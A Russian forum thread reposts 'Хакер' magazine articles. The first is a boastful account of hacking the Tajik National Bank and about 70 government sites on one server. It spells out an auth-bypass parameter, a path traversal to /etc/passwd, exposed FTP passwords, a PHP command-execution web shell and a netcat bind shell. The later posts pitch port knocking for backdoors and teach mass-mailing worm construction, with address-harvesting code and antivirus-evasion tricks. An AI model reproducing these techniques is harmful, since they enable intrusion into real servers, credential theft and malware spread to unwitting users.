Здравствуйте, гость ( Вход | Регистрация )



Гостевой доступ к форуму из Москвы: Телефоны: +7(495)7859696,7376201,7376233,7868796,7390241 Login: demo Password: demo
5 страниц V « < 3 4 5  
ОтветитьСоздать новую тему
> Журнал Хакер, Отдельные вырезки
Metallica
сообщение Dec 10 2006, 21:52
Сообщение #81


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Точикистонский косяк

Взлом сайтов национального банка, минфина и Президента Таджикистана

Большинство людей, сталкиваясь с сайтами серьезных организаций вроде национального банка, министерства финансов, Правительства и администрации Президента, сразу бросают глупую идею поломать авторитетный ресурс. Наивные ребята. Тебе остается только радоваться: я не из их числа и расскажу тебе сегодня, как мне удалось взломать самые главные сайты страны, известной своими трудолюбивыми гастарбайтерами и миллиардными наркопотоками, текущими через высокие и красивые горы на север.

[первое знакомство]

Я уже собрался выходить в оффлайн, как вдруг один мой знакомый постучал в асю и попросил посмотреть на странный sql-injection. Перейдя по предоставленному линку, я быстро принялся анализировать явный инжект. Казалось, я все делал правильно, но, по непонятным причинам, желаемого не получал. Я совсем увлекся исследованием бага, и вдруг мой товарищ сказал: «А знаешь, что ты сейчас ломаешь? Загляни на индекс». Перейдя на индексную страницу, я лицезрел гордую надпись: Национальный Банк Таджикистана.

[думаем о здоровье]

В тот же момент я перепроверил свою проксю на анонимность и со спокойной душой принялся анализировать сайт дальше.

Пройдясь по линкам и посмотрев структуру сайта, я ничего интересного не обнаружил. Сайт работал на самописном движке, никаких особых скриптов там не было, акцент был сделан именно на информативность сайта. Из найденных недоработок была разве что та sql-инъекция, которую мне показал приятель, но я не мог ее грамотно заюзать.

Почему-то в голове сразу промелькнула мысль: «Да это же Банк. Здесь не может быть ошибок. Уходить надо отсюда и забыть про все». Хотя постой, как же это так: не может быть ошибок, тут же в скрипте примитивная инъекция! В жизни не бывает случайностей.

Я стал размышлять дальше. Раз сайт часто обновляется и модерируется, думал я, значит, обязательно должна быть админка. Надо попробовать найти ее.

Особо не раздумывая, я ввел в адресную строку браузера http://admin.bank.ru и тут же получил пощечину: такого адреса не существовало. Я тут же исправил адрес на www.nbt.tj/admin и уже приготовился к очередному отказу, как вдруг увидел форму для ввода логина и пароля. Ну, вот уже кое-что. Проверка скрипта авторизации на различные баги ни к чему не привела, все было написано нормально. Либо все вредоносные символы жестоко отфильтровывались, либо авторизация была примитивной, пароль был жестко зашит в теле самого скрипта.

Отчаявшись, я запустил nmap, решив для своего спокойствия просканить сервер: nmap -sV -F www.nbt.tj. Не надеясь на чудо, я узнал, что на сервере открыты стандартные 80, 21, 22 и 3306 порты. Из сервисов были установлены ProFTPD и SSH. К моему сожалению, версии были стабильные, а достать приватные сплоиты для меня не было возможности. Я решил любой ценой прогрызть себе дыру через web.

[свежий взгляд]

Вернувшись на сайт, буквально сразу же я заметил неприглядную кнопочку переключения языка: были доступны русский и английский. Естественно, я не обратил на нее внимание с самого начала, ведь серфить на русском куда привычнее. Я загрузил английскую версию сайта и заметил, что url страницы сменился на www.nbt.tj/en. Наверное, у них просто сохранена точная структура сайта в папке /en. В который раз, пройдясь по линкам английской версии сайта, я убедился, что структура осталась прежней. Стоп! Раз структура сохранилась, значит, должна сохраниться и админка. Каково же было мое удивление, когда, обратившись к www.nbt.tj/en/admin, я увидел, что английская версия админки не была запаролена! Чем это объяснить? Тут можно только гадать, так как никто не подозревал, что ей будут пользоваться, ведь, скорее всего, сайтом управляют русскоязычные сотрудники, или же это просто критический недочет web-мастера. Но сейчас это не главное, сейчас я внутри. Интерес сильнее осторожности smile.gif.
[косяк админа]

С первых же секунд я принялся изучать возможности, доступные из админки. Первые несколько пунктов несли разочарование - из функций были лишь просмотр и редактирование статей, размещенных на сайте. Моя попытка исполнить php-скрипт в теле статьи не увенчалась успехом - я лишь увидел его исходный код. Можно было бы поставить снифер и попытаться поймать сессию админа, но что бы это дало? Я сомневался, что возможности русифицированной админки больше, чем английской.

Дальше - больше: раздел Files - просмотр архива всех статей и загрузка файлов. Все - вот оно. Нетерпеливо кликнув по ссылке для перехода к файл-менеджеру, я вновь получил отказ. Мне вежливо предложили залогиниться и даже уже вписали за меня логин: nbtjftp. Теперь оставалось угадать пароль, и я практически получаю веб-шелл.

Пара отчаянных попыток отгадать пароль с лета не увенчались успехом. Я остановился и начал соображать: сообщение над строкой формы логина гласило: Simple File Manager - Login.

В тот же момент я обратился к багтракам. Не один из них не знал такого скрипта и не содержал упоминаний как о данной версии, так и о предыдущих релизах. Мои надежды на удачный взлом таяли с каждой минутой, от безысходности я вновь вернулся к авторизации.

В правом нижнем углу был линк на сайт разработчика, откуда впоследствии я скачал исходники скрипта. Автор распространял его бесплатно, и, что самое интересное, он был еще в стадии альфа тестирования, а значит, шансы на то, что скрипт содержит недоработки, резко увеличивались. Я решил искать уязвимости сам.

[кодерский косяк]

Решив, для начала, ознакомиться с принципом работы скрипта и посмотреть, какие возможности кроются внутри, я залил его на свой сервер и залогинился под известным мне аккаунтом, предлагаемым разработчиком для тестирования: guest:demo. Данные о пользователе хранились в самом скрипте fm.php. Полазав по своим папкам, я нажал пимпу logout и вернулся к процессу авторизации. Вот что я заметил, проделав операцию логина еще раз: данные о пользователе передавались скрипту методом POST в переменных $user и $password. Если авторизация прошла успешно, то скрипт пропускал меня внутрь. Что самое интересное, в адресной строке после этого добавлялась переменная $u=guest. Таким образом, скрипт следил за тем, какой пользователь залогинен в данный момент. Если поменять значение переменной $u, то скрипт заругается и отправит меня к форме авторизации. Так вот же она моя бага, подумал я! Сделав логаут, я вновь очутился перед окошком ввода логина и пасса, только на этот раз я сообщил скрипту переменную $u, содержащую мой логин, который, кстати, автоматически прописывается в поле формы. После обновления страницы я добился того, чего хотел: авторизация была успешно обманута. Посмотрев исходники скрипта, я лишь только убедился в своей правоте: скрипт давал возможность редактировать переменную $u, которая была как бы флагом авторизации посредством GET запроса:
if (isset($_REQUEST['u'])) { $u = $_REQUEST['u']; }

else { $u = ""; }

Эта строчка и позволяла мне беспрепятственно изменить значение переменной, объявив скрипту, что я честно прошел процедуру авторизации и мне можно доверять. Критическая ошибка программиста-утырка сыграла мне на руку!

Уверенный в своей удаче, я решил наконец-таки разобраться с сайтом банка до конца.

Перейдя к файл-менеджеру по адресу www.nbt.tj/en/files/fm.php, я очутился перед знакомым окошком. Как и полагается, логин пользователя был уже прописан в своем поле, а это все, что мне было нужно. Я быстро переправил урл на www.nbt.tj/en/files/fm.php?u=nbtjftp и скрипт с удовольствием авторизировал меня.

[сплошной read only]

Каково же было мое разочарование, когда я обнаружил, что права на создание и редактирование файлов скрипт не предоставляет, также отсутствуют права на аплоад файлов на сервер. В общем, сплошной read only sad.gif. Рабочая директория была ограничена: скрипт отказывался подниматься уровнем выше, и были доступны только корневая папка, где и был проинсталлирован скрипт, причем хитрый автор запрограммировал его скрывать самого себя от глаз пользователя. Одним словом, я увидел совсем не то, что ожидал. И с этим надо было как-то бороться.

Наученный опытом подделки переменной $u, я тщательно следил за структурой урла и переменных, которые передаются скрипту. Мое подозрение пало на процесс просмотра файла, когда через переменную edit скрипту передавалось имя файла, указанного пользователем. Хм, а что если передать переменной что-то типа ../../../../../../../../etc/passwd? Таким образом, исправив урл на

www.nbt.tj/en/file/fm.php?u=nbtjftp&edit=../../../../../../../../etc/passwd&copt=1, я смог просматривать любые файлы на сервере, которые были доступны моему пользователю. Я решил посмотреть исходник скрипта, для чего задал значение переменной $edit, равное fm.php. Как я и ожидал, внутри сорца были жестко прописаны админские реквизиты: nbtjftp:ftpnb02.

После этого произошло самое ужасное: я задался извечным русским вопросом «что делать?». Мне хотелось намного большего, чем просто просмотр файлов, а свежих идей в голове практически не оставалось.

[сервер изнутри]

Решив немного отвлечься, я принялся читать авторское описание скрипта. Разработчик писал: «данный скрипт создан как альтернатива FTP и предназначен для людей, у которых нет возможности пользоваться фтп, или им по каким-то причинам отказано в доступе». Ну конечно, фтп! Вопреки всей логике автора программы я попытался залогиниться на фтпшник с добытыми логином и пассом, и, что самое удивительное, меня пропустили - вот он, доступ. На скорую руку я настрочил следующий код:
<?

echo "<pre>";

passthru($_GET['cmd']);

echo "</pre>";

?>

Выбрав неприметную директорию на сервере, я залил свой скрипт под именем search.php, чтобы тот не сильно выделялся среди других файлов. Сюда же я залил и bind.pl - бинд-шелл на перле со стандартными настройками бинда на 32767-ом порту. Забиндив для себя порт, со своего веб-шелла командой perl bind.pl, я приконнектился netcat'ом к серву:

nc.exe www.nbt.tj 32767

Играем дальше. Первым делом я узнал, кто еще пользуется системой в данный момент, и последние подключения:

who;

last -10;

К счастью, админов на месте не было, и я работал с машиной один. Дальше я выяснил свои права и операционку, установленную на сервере:

id; uname -a;

Оказалось, что я работал из-под юзера apache, а сервачок крутился под управлением gentoo c ядром 2.6.11. К сожалению, рута здесь взять не получится, хотя чего еще я ожидал здесь увидеть? Оставшись без рутового шелла, я принялся исследовать сервер дальше. Просмотрев папку htdocs, я с удивлением обнаружил, что на этом сервачке хостится еще около 70 сайтов, среди которых были замечены проекты Министерства Иностранных Дел, Министерства Финансов, Сайт Президента, еще несколько банков, интернет-провайдер, телевидение и газета. В общем, весь Таджикистанский хай-тек поместился на одном сервере, который из-за админов-наркоманов вскоре позволил мне получить полный доступ ко всем сайтам, включая ресурс Президента республики Точикистон smile.gif. Я вот до сих пор сдерживаю себя от того, чтобы поменять фотографию Президента на свою smile.gif.

[по порядку]

Однако не будем забегать вперед, расскажу все по порядку. Размышляя над тем, как лихо мне удалось получить доступ к FTP, я пришел к выводу, что для каждого сайта сделана своя учетная запись и каждому ресурсу позволено юзать FTP. Вспомнив логи nmap, я узнал, что на серве установлен ProFTPD. Я решил найти конфиги этого сервиса и посмотреть, какие учетные записи там есть. Для этого я выполнил следующую команду:

# find / -type f -name "proftpd*";

Среди найденных файлов, есть то, что мне нужно, - это файлик /etc/proftpd/proftpd.conf. Просмотрев его, я просто обомлел. Никогда еще такого не видел. В заголовке каждого блочка с описанием ftp-пользователя в комментарии был прописан ПАРОЛЬ этого юзера! Например, описание логина с говорящим названием president.tj выглядело так:

# president.tj

# p:SomonTj

User president

Group users

MaxClients 10

AnonRequirePassword on

RequireValidShell off

AllowOverwrite on

Получив доступ ко всем ftp-аккаунта на сервере, я решил продолжить свои изыскания. Покопавшись в различных скриптах, я выудил несколько mysql-аккаунтов. Однако, вопреки ожиданиям, в базах данных я не нашел никаких сведений о маршрутах поставок гашиша, оружия и перевозки иммигрантов; все, что было в базе, - это тексты публикаций и прочий мусор. Хотя в БД одного банка, я обнаружил нечто похожее на систему авторизации. На их сайте же, я прочитал, что они вскоре планируют открыть сервис онлайн-банкинга. Ну вот, сервис еще не открыли, а доступ уже есть smile.gif.
[вместо заключения]

Все просто элементарно. За несколько часов работы я поимел все онлайн-представительства целой страны. Возможно, некоторые скажут, что взлом во многом примитивен: пустой пароль в скрытой админке, элементарный баг воспаленного программерского мозга, маразматичное решение администратора записать пароли пользователей в комментариях конфига ftp-сервера. Однако такое положение дел во многом показательно, не следует думать, что такое «разгвоздяйство» - единичный случай. Многие администраторы, особенно на пост-советском пространстве, относятся к возможности взлома, как к чему-то сверхъестественному, что происходит с кем угодно, но только не с ними.

Как показал мой пример, внедряя хай-тек, нужно быть очень осторожным. А то получится такой же косяк, как и у точикистонцев smile.gif.

Полезные ссылки

* Утилита Netcat, без которой не обходится ни один взлом: http://cesnet.dl.sourceforge.net/sourcefor...at-0.7.1.tar.gz

* Популярный сканер Nmap: www.insecure.org/nmap/nmap_download.html

* Бажный скрипт Simple File Manager с идиотской дыркой, благодаря которой я поимел все серверы Таджикистана: http://sourceforge.net/project/showfiles.php?group_id=60333

* bind.pl - перловый скрипт, биднящий шелл на указанном порту: www.oak.hu/avatar/bind.pl

Бажный движок

На взломанном сайте использовался движок Simple File Manager, который можно скачать по адресу http://sourceforge.net/project/showfiles.php?group_id=60333. В скрипте допущена идиотская ошибка, которую мог сделать только школьник 9 лет. После авторизации пользователя в качестве флага, обозначающего тот факт, что он ввел корректный пароль, скрипту передается GET-переменная u, указывающая логин, под которым вошел пользователь. Таким образом, для авторизации достаточно лишь подставить требуемый логин в эту переменную. Это уже само по себе жесткий баг, но еще хуже становится от того факта, что скрипт сам сообщает взломщику требуемый логин: он подставляет его в форму авторизации. Придурошный ход для сомнительного повышения usability обернулся жестким багом.

WARNING

Следует понимать, что все, что я проделал - это противозаконно. Эта статья дана лишь для ознакомления и организации эффективной защиты. За применение материала в незаконных целях, несешь ответственность только ты сам. Соблюдай законы своей страны.

CD/DVD

На нашем диске ты найдешь все программы, описанные в статье, а также видеоиллюстрацию к этому взлому. Чтобы всякие утырки не говорили, что все это мы придумали сами.










--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 10 2006, 22:38
Сообщение #82


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Intro

Новый год уже совсем близко. Тебе дается возможность прекрасно потратить время в размере 10 дней, данное тебе свыше. Провести время с близкими и друзьями, потому что, опять же, так тебе сказали свыше smile.gif. Ведь самостоятельно придумать повод для праздника население нашего государства вряд ли сможет. Поэтому это придумали за нас. Чтобы нас всех объединить и дать нам возможность по-настоящему повеселиться хоть раз в году.

А тебе ведь, в принципе, ничего не мешает устроить себе праздники, отдыхать с приятными тебе людьми? Мешает? Тогда стоит призадуматься. Не мешает? Ну тогда все хорошо.

Итак, Новый год. Что тебе нужно сделать? Правильно, купить елку! А что потом необходимо с ней сделать? Правильно, нарядить! А еще что нужно сделать перед Новым годом? Правильно, купить подарки друзьям и близким. Что ж, алгоритм программы давно запрограммирован. Осталось только нажать кнопочку start. Жми ее. С наступающим тебя Новым годом smile.gif.

Port Knocking. Новый фокус от админов в действии

Сканирование портов - излюбленный прием сетевых взломщиков. С его помощью можно легко определить активные сервисы, выяснить названия и версии используемого софта, после чего попытаться найти подходящий эксплойт. Иногда сканер портов показывает фигу и говорит, что на удаленной машине открытых портов нет. Конечно, работающих сервисов может действительно не быть, но возможен и другой вариант - администратор использует прием Port Knocking.

[порт - что?]

«Порт нокинг» - это особая технология передачи данных. Для того чтобы лучше ее понять, вспомни азбуку Морзе и конкретно обозначение слова SOS. Сигнал бедствия передается с помощью комбинации - три точки, три тире, три точки. Три точки, соответственно, обозначает букву S, а три тире - букву O. Для всех остальных символов также существуют аналогичные обозначения. Таким образом, общий принцип очень прост: с помощью последовательностей точек и тире можно представить любую букву, а соответственно, слово и текст. Технология Port Knocking использует очень схожий принцип. Разница лишь в том, что для кодирования информации применяются не точки и тире, а серии попыток подключения к закрытым портам. Зачем это нужно? Для многого.

Возьму сразу распространенный и банальный пример. Если клиенту заранее известна секретная последовательность подключений, то он может подключиться даже к тому серверу, у которого открытые порты внешне отсутствуют. Скажем, если бы я хотел приконнектиться к взломанному серверу через SSH, то сконструировал такой бэкдор, который не использует напрямую 22 или любой другой порт. Такой подход сразу же вызовет подозрения у любого опытного администратора. Лучше сделать так, чтобы бэкдор определял попытки подключения последовательно на 1011, 1007, 1033, 1002, 1000 порты, после чего открывал доступ к SSH-порту на несколько секунд. Этих секунд будет вполне достаточно, чтобы подключиться и комфортно работать в системе.

Последовательность попыток подключения к закрытым портам называется Knock (тук-тук!). Несмотря на то, что все порты на сервере закрыты, все попытки непрерывно отслеживаются, и информация о них записываются в логи файрвола. Сервер чаще всего никак не отвечает на эти подключения, но он считывает и обрабатывает их. Если серия подключений обозначена в настройках специального Port Knock демона, на сервере тут же выполнится определенное действие. В большинстве случаев открываются несколько портов, например, 22 - для возможности подключения администратора к SSH-сервису. Но это лишь один из вариантов. Триггер может совершенно по-разному реагировать на правильный «тук-тук!» и не только динамически изменять правила файрвола, а еще выполнять любые другие административные действия (скажем, выполнять перезагрузку системы, отключение питания и т.п.). Что касается выбора Knock'ов, то он произволен и зависит исключительно от разработчика. Единственное условие - последовательность подключений (или алгоритм ее составления) должна быть заранее известна как для серверной, так и клиентской стороны.





Сообщение отредактировал Metallica - Dec 10 2006, 22:41


--------------------
Самые лучшие отзывы обо мне : [лопатой мозги вправить ], [Oбиженный жизнью заморыш],[ грубый и туповатый] , [не хватает интеллекта смотреть на мир шире. И все враги.], [озлобленный мальчик, помешанный на «членах» ] , [узколобость и шовинизм - это к имбецилам и другим болезням]
Пользователь offlineПрофайлОтправить личное сообщение
Вернуться к началу страницы
+Цитировать сообщение
Metallica
сообщение Dec 11 2006, 20:22
Сообщение #83


Oбиженный жизнью заморыш
Group Icon

Группа: Administrators
Сообщений: 2 136
Регистрация: 4-August 06
Из: Матрица
Пользователь №: 504
Имя: TONY MONTANO
Настроение: KILL EM ALL
Заходит на форум с гостевика или полного инета.



Разводим червей


Что такое мыльные черви, и с чем их едят

Такое явление как массовое распространение червей в Сети коснулась, думаю, любого. Наверняка ты уже знаешь таких сетевых представителей беспозвоночных, как Beagle и MyDoom, они заразили сотни тысяч машин и наделали немало шума. Может быть, ты думаешь, что сделать самому подобного зверя очень трудно? Это не так, мыльный червь на самом деле не представляет собой ничего сложного. И в этой статье я это попытаюсь доказать, рассказав тебе о принципах функционирования мыльных червей и об особенностях их реализации. Но хочу тебя сразу предостеречь, что черви чрезвычайно опасны, поэтому обращаться с ними надо со всей осторожностью, иначе можно наделать бед и загреметь за решетку. Так что все написанное в этой статье следует использовать только в учебных целях. В общем, начинаем разводить червей.

[как работает червь?]

Общий принцип работы всех мыльных червей - это рассылка писем, в аттачах которых находится копия червя, предназначенная юзеру. Наверно, ты думаешь, что это вздор, аттачи сейчас никто не запускает. Однако статистика говорит, что приложения в сомнительных письмах запускает 2-3% пользователей, а этого вполне достаточно для успешного распространения червей. После запуска червь каким-либо образом прописывает себя в автозагрузку. Следующим этапом работы червя является поиск всех e-mail адресов на зараженной машине, они извлекаются из адресной книги Outlook (либо других почтовых программ) и ищутся в html-, txt- и doc-файлах по всем дискам зараженной машины. Третьим этапом жизни червя является рассылка себя по всем найденным адресам. Все это с первого взгляда кажется примитивным, но на всех этапах есть множество важных тонкостей, которые нужно обязательно учесть для того, чтобы червь стал жизнеспособным. Необходимо заставить сервер принять письмо, а пользователя запустить в аттач. Нетривиальной также будет борьба с антивирусами, спамфильтрами почтовых систем, файрволами и различными фильтрами аттачей в mail-клиентах. Короче говоря, проблем у червеписателей хватает. Итак, приступим к рассмотрению всех этапов жизни червя по порядку.

Начнем с самого важного, по моему мнению, вопроса, который возникает при создании червя - как заставить юзера запустить аттач? В первую очередь нужно обойти проблемы технического характера, главной из которых может быть запрет открытия исполняемых файлов почтовой программой. Уже давно прошли времена, когда можно было смело посылать на мыло exe-файл и надеяться, что пользователь его запустит. Сейчас даже самый тупой юзер (на которого и рассчитаны мыльные черви) не запустит такой аттач по той причине, что ему не даст это сделать почтовая программа, либо письмо будет удалено фильтром вложений файрвола. Первое, что приходит на ум - это засунуть исполняемый файл в архив. Почтовые фильтры не рискнут удалять такие аттачи, а юзеру нетрудно будет открыть такой архив и запустить файл. Если на архив также поставить пароль и записать его в тексте письма, то будут пасовать и антивирусы на почтовых серверах, однако процент заражений несколько снизится.

Допустим, нам удалось создать аттач, который проходит все mail-фильтры и успешно попадает к пользователю. Теперь возникает задача заставить юзера его запустить. Издавна для этого используют социальную инженерию, то есть обычный развод. Для этого в письме пишут, что оно содержит security updates или еще какою-нибудь полезную программу. Также распространен метод создания в архивах файлов с двойными расширениями, при этом файл обычно имеет расширение .xls [очень много пробелов].exe и иконку документа Microsoft Exсel. Часто трояны в аттачах имеют расширение .pif, которое не отображается в эксплорере даже тогда, когда включено отображение расширений всех файлов.

Что такое червь и как он должен работать, думаю, тебе понятно. Теперь приступим непосредственно к рассмотрению технических вопросов, которые возникают в процессе создания беспозвоночных.

[релеинг и резолвинг]

Проблема №1, которую нам нужно решить - это сама отсылка копии червя на e-mail адрес. В статье «Методы управления RAT», в июльском номере, я рассматривал процесс отправки мыла через SMTP-сервер mail.ru. Такой метод отправки подходит для различных парольных троянов, но для массовой рассылки червей неприменим. Потому что для его работы нужно иметь один или несколько постоянно работающих SMTP-серверов, через которые будет идти почта. Я думаю, ты уже понял, что такие серверы мгновенно прикроют доступ к себе, как только червя обнаружат, да и вряд ли какой-то SMTP сможет выдержать нагрузку, даваемую тысячами распространяющихся червей. Поэтому нам нужно отправлять почту, минуя центральный SMTP-сервер.

Что происходит с письмом, отправленным через какой-нибудь smtp.mail.ru? В этом случае сервер маил.ру работает, как SMTP Relay, то есть как перенаправитель сообщения от клиента на SMTP-сервер получателя. А зачем в цепочке рассылки лишний элемент, ведь можно отправлять почту напрямую получателю, минуя SMTP Relay. Как же нам узнать адрес SMTP сервера получателя? Это очень просто! Адрес SMTP, принимающего почту в каком-либо домене всегда определяется соответствующей MX-записью для этого домена на DNS-серверах.

Для начала нам нужно сделать резолвинг MX-записи нужного домена. Реализуется это двумя способами.

Первый - написание своего DNS Resolver'а, который бы формировал запрос, посылал его серверу, принимал и декодировал ответ. Второй - использовать для этого DNS API. Второй вариант, конечно, гораздо проще, но он имеет один большой недостаток - функции DNS API появились только в Windows 2000 Professional (в не Pro версиях они отсутствуют!), а так как основным контингентом пользователей, заражаемых почтовыми червями, будут ламеры, сидящие на старых и необновленных системах, то такой метод резолвинга лучше не использовать. Однако для ознакомления с DNS API, я приведу код, резолвящий MX-записи.

function MXResolve(Domain: PChar): string;

var

pQueryResultsSet: PDNS_RECORD;

HostEnt: PHostEnt;

Name: PChar;

begin

pQueryResultsSet := nil;

if DnsQuery(Domain, DNS_TYPE_MX, DNS_QUERY_STANDARD, nil, @pQueryResultsSet, nil) = 0 then

begin

Result := pQueryResultsSet^.Data.MX.pNameExchange;

GlobalFree(dword(pQueryResultsSet));

end;

end;

Как ты видишь, резолвить с помощью DNS API проще простого, но так как этот метод не всегда приемлем, перейдем к рассмотрению следующего метода.

[ручной DNS резолвинг]

Я попытаюсь рассказать немного о DNS-протоколе. Я не ставлю перед собой цели подробно рассказывать обо всей системе, но попытаюсь дать основные понятия, необходимые для понимания этого протокола. Подробно ты можешь все прочитать в документации RFC 1034 и 1035.

DNS-запросы бывают разного типа. Тип запроса имеет числовое значение от 1 до 16 и определяет информацию, которую вы желаете получить. Номер типа ответа всегда соответствует номеру типа запроса, чтобы знать, что и к чему относится. Вот основные типы DNS-запросов:

01 A host address (IP адрес хоста)

02 NS authoritative name server (NS сервер)

03 MD mail destination (устар.тип, сейчас юзают MX)

04 MF mail forwarder (устар.тип, сейчас юзают MX)

05 CNAME the canonical name for alias

06 SOA marks of a start of zone of authority

07 MB (experimental)

08 MG (experimental)

09 MR mail rename domain name (experimental)

10 NULL a null RR

11 WKS a well known service description

12 PTR a domain name pointer

13 HINFO host information

14 MINFO mail box or mail list information

15 MX mail exchange

16 TXT text string

Из них нас интересуют только MX-записи, имеющие номер 15. Наряду с типом запроса, существует еще и класс запроса. Это связано с тем, что протокол DNS универсален и может работать практически в любых сетях, а не только в TCP/IP. Так как другие сети нам не понадобятся, нас будет интересовать только один класс запросов - IN (=1), который предназначен для использования в Интернете. Пакет запроса имеет следующий вид:

Packet Length - 2 байта

Query/Response header - 12 байтов

Question - нет фиксированной длины, зависит от количества вопросов

Answer - формируется сервером, нет фиксированной длины

Authority - формируется сервером, нет фиксированной длины

Additional - формируется сервером, нет фиксированной длины

Запрос должен включать в себя Length, Header и Question, а ответ может иметь все поля, но поле Answer в нем является обязательным.

Теперь определим структуру, описывающую заголовки Query/Response header:

TDNSHeader = packed record

qryID : word; - идентификатор запроса

options: word; - флаги

qdcount: word; - счетчик записей в поле Question

ancount: word; - счетчик записей в поле Answer

nscount: word; - счетчик записей в поле Authority

arcount: word; - счетчик записей в поле Additional

end;

TQueryType = packed record

QType : word; - тип запроса

QClass: word; - класс запроса

end;

Чтобы получить адрес SMTP-сервера, куда мы хотим послать письмо, мы должны составить запрос, послать его, принять и декодировать ответ. Со структурой запроса, я думаю, все понятно, давай теперь разберемся с возвращаемыми ответами, а для этого надо разобраться, что такое RR-записи. Они формируются NS-сервером и располагаются только в ответе и строго следом за полем запроса. То есть Answer и все последующие состоят из некоторого количества RR-записей различного формата. В них передаются в качестве информации и IP-адреса, и названия серверов, и просто текстовая информация. Подробно все типы этих записей приведены в RFC 1035, они довольно похожи друг на друга и различаются лишь мелкими деталями. Так что я буду говорить только об интересующих меня. Аббревиатура RR означает Resource Record (это официальное название из документа).

RR-запись выглядит так:

NAME up to 255 bytes + 1 ('\0')

TYPE 2 bytes (UINT)

CLASS 2 bytes (UINT)

TTL 4 bytes (signed 32 bits number - 'long')

RDLENGTH 2 bytes (UINT)

RDATA variable, depend on query

Где NAME - название хоста, к которому относится запись, TYPE - тип представляемой информации (о типах см. выше), CLASS - класс сети (в нашем случае всегда 'IN' (01)), TTL - время хранения информации в секундах, RDLENGTH - длина блока информации в байтах, RDATA - блок представляемой информации.

Самой главной проблемой при декодировании ответа будет разбор возвращаемых имен хостов. Имя хоста состоит из нескольких частей. Перед каждой частью ставится байт, определяющий ее длину. Например, www.microsoft.com будет выглядеть как 03 www 09 microsoft 03 com 00, имя всегда оканчивается нулевым байтом. Но самая главная фича не в этом, а в том, что имя может быть упаковано. Упаковывают имя, используя указатель, он представляет собой два байта, причем первый используется в качестве семафора, два старших бита этого семафора установлены в 1, а остальные не определены. Второй байт является смещением от начала запроса, то есть от первого байта идентификатора. Если байт длины равен $C0, то следующий за ним байт будет указателем (кошмар - прим. gorl'а). Напишем функцию, декодирующую такие имена:

function GetQName(var RecvData; Offset: Integer; var Pt: Pointer): string;

var

ChPt : PChar;

ReadBytes : Byte;

begin

Result := '';

ChPt := @RecvData;

Inc(ChPt, Offset + 1);

while ChPt^ <> '' do

begin

if ChPt^ = #$C0 then

begin

Inc(ChPt);

Result :=Result + GetQName(RecvData, Ord(ChPt^) - 1, Pt);

Break;

end else

begin

ReadBytes := Ord(ChPt^);

while ReadBytes > 0 do

begin

Inc(ChPt);

Result := Result + string(ChPt^);

Dec(ReadBytes);

end;

end;

Inc(ChPt);

if (ChPt^ <> '') then Result := Result + '.';

end;

Pt := ChPt;

end;

Так как объем статьи не позволяет рассмотреть процесс MX-резолвинга целиком, то я рассмотрю здесь только еще один важный момент - получение IP DNS-сервера, через который мы будем слать запросы. В этом нам поможет функция GetNetworkParams из iphlpapi.dll. Эта функция возвращает различную информацию о сетевых адаптерах, в том числе и адреса, связанных с ними DNS.

function GetDNSServer(): dword;

var

FixedInfoSize : Integer;

FixedInfo : PFixedInfo;

PDNS :PIPAddrString;

GetNetworkParams : function(FI:PFixedInfo; var BufLen: Integer): Integer; stdcall;

begin

Result := 0;

GetNetworkParams := GetProcAddress(LoadLibrary('iphlpapi.dll'),

'GetNetworkParams');

if @GetNetworkParams = nil then Exit;

FixedInfoSize := 1024;

GetMem(FixedInfo, FixedInfoSize);

if GetNetworkParams(FixedInfo, FixedInfoSize) = ERROR_SUCCESS then

begin

PDNS := @FixedInfo^.DNSServerList;

if PDNS <> nil then Result := inet_addr(PDNS^.IPAddress);

end;

FreeMem(FixedInfo);

end;

Работающий пример MX-резолвера ты можешь найти на диске.

[получение адресов для рассылки]

Перед тем как начинать рассылку копий червя, неплохо было бы определить адреса, по которым мы будем его рассылать. Для этого нам нужно сначала вытащить все адреса из адресной книги юзера, а затем и просканировать все файлы на дисках на их наличие.

Попробуем для начала достать адреса из адресной книги Outlook. Нужная нам информация хранится в .wab файлах, и в виду их простой стуктуры будет нетрудно их распарсить вручную. Вот пример кода, сохраняющего все адреса из wab-файла в файл Emails.txt:

procedure ReadWAB(WABFile: string);

var

F : file;

I : dword;

S : string;

N : array[1..5] of Char;

Buf : array[1..500] of Char;

R : TextFile;

begin

AssignFile(R,'Emails.txt');

ReWrite®;

AssignFile(F,WABFile);

Reset(F,1);

if IOResult=0 then begin

repeat

BlockRead(F,N,2);

if N[1]+N[2]=#03#48 then begin

BlockRead(F,Buf,Ord(N[2])+30);

S:='';

for I:=1 to Ord(N[2])+30 do S:=S+Buf[I];

Delete(S,1,3);

I:=Pos(#00#00#00,S);

if I>0 then SetLength(S,I-1);

for I:=1 to Ord(N[2]) do if S[I]=#00 then Delete(S,I,1);

for I:=1 to Length(S) do

if S[I]<chr(45) then begin

SetLength(S,I-1);

Break;

end;

if (Pos('@',S)>0)and(Pos('.',S)>0) then

writeln(r,UpperCase(S));

end else Seek(F,FilePos(F)-1);

until FileSize(F)-FilePos(F)<6;

CloseFile(F);

end;

CloseFile®;

end;

Ну, и совсем просто будет извлечь адреса из Windows Messenger, так как они просто хранятся в реестре, в разделе HKEY_CURRENT_USER\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service, откуда их можно прочитать, просто перечислив соответствующие ключи. Как это сделать, я думаю, ты и сам догадаешься.

